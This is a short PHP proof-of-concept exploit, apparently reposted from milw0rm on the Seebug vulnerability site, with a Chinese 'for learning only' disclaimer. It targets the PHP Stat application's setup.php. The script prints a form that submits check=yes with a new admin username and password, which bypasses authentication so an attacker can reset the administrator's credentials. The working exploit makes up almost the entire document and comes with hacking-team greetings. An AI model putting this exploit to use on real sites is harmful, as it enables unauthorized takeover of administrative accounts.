<?php error_reporting(E_PARSE); /* ================================================================ PHP Stat Administrative User Authentication Bypass POC Exploit ================================================================ ====Trap-Set Underground Hacking Team===========mh_p0rtal============ Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams : Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam , CrouZ Security Team , Simorgh-ev Security Team , ====================^^^^^^^^^^^^^^^^^^^-========================= */ # Config ________________________________ # address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php $url = "http://www.site.com/setup.php"; # EnD ___________________________________ print "<form action=\"$url?check=yes&username=$username&password=$password\" >"; print "<input type=\"hidden\" name=\"check\" value=\"yes\">"; print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>"; print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>"; print ("<input type=submit value=::Change. > \n"); print "</form>"; //------------------------------------------------------End. ?> # milw0rm.com [2005-05-30]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论